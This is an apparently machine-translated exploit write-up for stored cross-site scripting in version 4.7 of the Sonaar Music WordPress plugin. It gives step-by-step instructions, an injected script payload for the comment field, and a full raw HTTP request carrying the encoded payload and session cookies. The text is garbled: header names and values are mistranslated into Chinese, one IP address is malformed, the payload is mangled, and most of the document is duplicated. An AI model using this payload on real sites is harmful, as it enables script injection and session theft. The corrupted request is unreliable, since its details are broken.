#利用标题: WordPress Sonaar音乐插件4.7-存储的XSS
#日期: 2023-09-05
#利用作者: Furkan Karaarslan
#类别: WebApps
#供应商homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php
#版本: 4.7(必需)
#在: Windows/Linux上测试
--------------------------------------------------------------------------------------------------------------------------------------------------------
第1个安装声纳音乐插件。
2-然后来到播放列表添加页面。 http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist
3点添加新的播放列表按钮
在页面上打开并发布页面上的4个随机标题。 http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist
5-这是发布的第3http://127.0.0.0.1/wp/wordpress/album_slug/test/
6-lem的粘贴我们的XSS有效载荷在评论部分。 PAYLOAD: SCRIPTTALERT('XSS')/脚本
宾格
请求:
post/wp/wordpress/wp-comments-post.php http/1.1
HOST: 127.0.0.1
内容长度: 155
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://127.0.0.1
content-type:应用程序/x-www-form-urlenceded
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
REFEER: http://127.0.0.1/wp/wordpress/album_slug/test/
Accept-incoding: Gzip,放气
Accept-Language: Tr-Tr,Tr; Q=0.9,En-US; Q=0.8,en; q=0.7
cookie: comment_author_email_52c14530c1f3bbfa6d982f30480224a=a%40GMAIL.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26GT%3balert%28%29; wordpress_test_cookie=wp%20cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f30480224a=hunter%7C1694109284%7cxxgnjfgcc7fpgqkkjraw uv1kg8xaqu3rixudyzjorsb1w%7C16E2E3964E42D9E56EDD7EB7E45B67676094D0B9E0B9E0AB7FCEC2E844549772E438BA9; WP-SETTINGS时间1=1693936486
连接:关闭
注释=%3CScript%3ealert%28%22XS%22%29%29%3C%2FScript%3Submit=Yorum+G%C3%B6NDerComment_Post_ID=13Comment_Parent_Parent=0_WP_UNFILTERED_HTML_COMMENT=95F4BD9CF5
#日期: 2023-09-05
#利用作者: Furkan Karaarslan
#类别: WebApps
#供应商homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php
#版本: 4.7(必需)
#在: Windows/Linux上测试
--------------------------------------------------------------------------------------------------------------------------------------------------------
第1个安装声纳音乐插件。
2-然后来到播放列表添加页面。 http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist
3点添加新的播放列表按钮
在页面上打开并发布页面上的4个随机标题。 http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist
5-这是发布的第3http://127.0.0.0.1/wp/wordpress/album_slug/test/
6-lem的粘贴我们的XSS有效载荷在评论部分。 PAYLOAD: SCRIPTTALERT('XSS')/脚本
宾格
请求:
post/wp/wordpress/wp-comments-post.php http/1.1
HOST: 127.0.0.1
内容长度: 155
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://127.0.0.1
content-type:应用程序/x-www-form-urlenceded
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
REFEER: http://127.0.0.1/wp/wordpress/album_slug/test/
Accept-incoding: Gzip,放气
Accept-Language: Tr-Tr,Tr; Q=0.9,En-US; Q=0.8,en; q=0.7
cookie: comment_author_email_52c14530c1f3bbfa6d982f30480224a=a%40GMAIL.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26GT%3balert%28%29; wordpress_test_cookie=wp%20cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f30480224a=hunter%7C1694109284%7cxxgnjfgcc7fpgqkkjraw uv1kg8xaqu3rixudyzjorsb1w%7C16E2E3964E42D9E56EDD7EB7E45B67676094D0B9E0B9E0AB7FCEC2E844549772E438BA9; WP-SETTINGS时间1=1693936486
连接:关闭
注释=%3CScript%3ealert%28%22XS%22%29%29%3C%2FScript%3Submit=Yorum+G%C3%B6NDerComment_Post_ID=13Comment_Parent_Parent=0_WP_UNFILTERED_HTML_COMMENT=95F4BD9CF5
